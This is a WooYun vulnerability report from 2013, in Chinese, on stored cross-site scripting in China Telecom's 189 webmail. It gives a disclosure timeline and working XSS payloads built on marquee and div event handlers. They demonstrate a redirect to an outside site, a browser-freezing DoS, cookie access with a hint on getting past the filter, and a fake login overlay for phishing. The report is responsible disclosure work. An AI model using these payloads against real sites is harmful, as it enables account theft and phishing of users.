漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-032810
漏洞标题:中国电信189邮箱邮件内容存储型跨站两枚
相关厂商:中国电信
漏洞作者: Liuz5O69
提交时间:2013-07-30 14:37
修复时间:2013-09-13 14:37
公开时间:2013-09-13 14:37
漏洞类型:xss跨站脚本攻击
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-08-03: 厂商已经确认,细节仅向厂商公开
2013-08-13: 细节向核心白帽子及相关领域专家公开
2013-08-23: 细节向普通白帽子公开
2013-09-02: 细节向实习白帽子公开
2013-09-13: 细节向公众公开
简要描述:
189邮箱邮件正文对部分标签下的脚本过滤不严,导致存储型跨站漏洞,利用该漏洞可实施Cookie窃取、页面DoS、网页挂马、跨站钓鱼。
详细说明:
189邮箱邮件正文对marquee和div事件触发两种情况下的跨站脚本未进行过滤,导致攻击者可利用。例如提交:
<marquee behavior=slide onstart="alert('marquee_XSS')"></marquee>
<div style="color:#FFFFFF" onmouseenter="alert('ondri_div_XSS')">test</div>
在IE和火狐浏览器下可以触发(webkit内核不支持以上两种),如图IE内核360浏览器:
火狐浏览器如图:
漏洞证明:
1.提交如<marquee behavior=slide onstart="location.href='http://www.xmd5.org'"></marquee>可实施挂马攻击,如图:
2.提交如<marquee scrollamount=1000 onstart="alert('DoooooooS...')"></marquee>可实施页面DoS,用户必须强制杀掉浏览器进程关闭,如图:
3.Cookies窃取,提交
<marquee behavior=slide onstart="alert(document.cookie)"></marquee>
需要做编码转换,189邮箱对document.cookie做了邮件拦截,直接提交收不到邮件。
4.跨站钓鱼,提交:
<marquee behavior=slide onstart="top.window.setTimeout('document.writeln("This is a XSS Phishing Test...<p>");document.writeln(\'user:<input type="text" name="textfield" \/>pass:<input type="text" name="textfield2" \/><input type="submit" name="Submit" value="Submit" \/>\')',2000)"></marquee>
可以实施跨站钓鱼,这里我简单的验证了下,和传统钓鱼不同,以上脚本会把189邮箱页面完全刷写成伪造页面,且能保证URL不变化,较传统钓鱼攻击欺骗性较大,如图:
可以看到地址栏还是189邮箱正常URL,但是页面已经被强制刷成指定内容了
修复方案:
过滤
版权声明:转载请注明来源 Liuz5O69@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-08-03 17:18
厂商回复:
最新状态:
暂无